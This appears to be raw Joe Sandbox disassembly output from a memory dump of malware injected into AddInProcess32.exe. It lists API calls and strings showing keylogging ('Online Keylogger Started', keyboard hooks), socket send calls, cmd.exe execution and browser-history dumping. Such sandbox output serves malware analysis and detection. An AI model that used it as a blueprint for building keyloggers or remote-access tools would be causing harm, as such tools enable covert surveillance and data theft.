  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
APIs
• API ID: _free
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
• __alloca_probe_16.LIBCMT ref: 0044FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
• __freea.LIBCMT ref: 0044FFC4
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 313313983-0
                                                                                                        • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                        • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                        • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                        • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                        • _free.LIBCMT ref: 0044E1A0
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 336800556-0
                                                                                                        • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                        • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                        • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                        • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                        • _free.LIBCMT ref: 00446F7D
                                                                                                        • _free.LIBCMT ref: 00446FA4
                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                        • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                        • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                        • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0044F7B5
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 0044F7C7
                                                                                                        • _free.LIBCMT ref: 0044F7D9
                                                                                                        • _free.LIBCMT ref: 0044F7EB
                                                                                                        • _free.LIBCMT ref: 0044F7FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                        • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                        • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00443305
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 00443317
                                                                                                        • _free.LIBCMT ref: 0044332A
                                                                                                        • _free.LIBCMT ref: 0044333B
                                                                                                        • _free.LIBCMT ref: 0044334C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                        • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                        • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                        APIs
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                        • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                        • String ID: (FG
                                                                                                        • API String ID: 3142014140-2273637114
                                                                                                        • Opcode ID: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                        • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                        • Opcode Fuzzy Hash: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                        • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                        APIs
                                                                                                        • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                        • _free.LIBCMT ref: 0044D5C5
                                                                                                          • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                          • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                                          • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                        • String ID: *?$.
                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                        • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                        • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                        • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                        • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                        APIs
                                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                          • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                        • String ID: XCG$`AG$>G
                                                                                                        • API String ID: 2334542088-2372832151
                                                                                                        • Opcode ID: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                        • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                        • Opcode Fuzzy Hash: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                        • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00442714
                                                                                                        • _free.LIBCMT ref: 004427DF
                                                                                                        • _free.LIBCMT ref: 004427E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        • API String ID: 2506810119-760905667
                                                                                                        • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                        • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                        • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                        • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                        APIs
                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                        • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EventObjectSingleWaitsend
                                                                                                        • String ID: LAL
                                                                                                        • API String ID: 3963590051-3302426157
                                                                                                        • Opcode ID: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                        • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                        • Opcode Fuzzy Hash: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                        • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                        • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                        • API String ID: 368326130-2663660666
                                                                                                        • Opcode ID: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                        • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                        • Opcode Fuzzy Hash: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                        • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                        • wsprintfW.USER32 ref: 0040A905
                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                        • API String ID: 1497725170-1359877963
                                                                                                        • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                        • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                        • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                        • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                        • String ID: Online Keylogger Started
                                                                                                        • API String ID: 112202259-1258561607
                                                                                                        • Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                        • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                        • Opcode Fuzzy Hash: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                        • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                        • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                        • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                        • String ID: `@
                                                                                                        • API String ID: 2583163307-951712118
                                                                                                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                        • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                        • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                        • String ID: Connection Timeout
                                                                                                        • API String ID: 2055531096-499159329
                                                                                                        • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                        • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                        • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                        • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                        • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                        • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                        • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                        • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                        • API String ID: 587946157-3896048727
                                                                                                        • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                        • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                        APIs
                                                                                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetCursorInfo$User32.dll
                                                                                                        • API String ID: 1646373207-2714051624
                                                                                                        • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                        • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                        • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                        • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
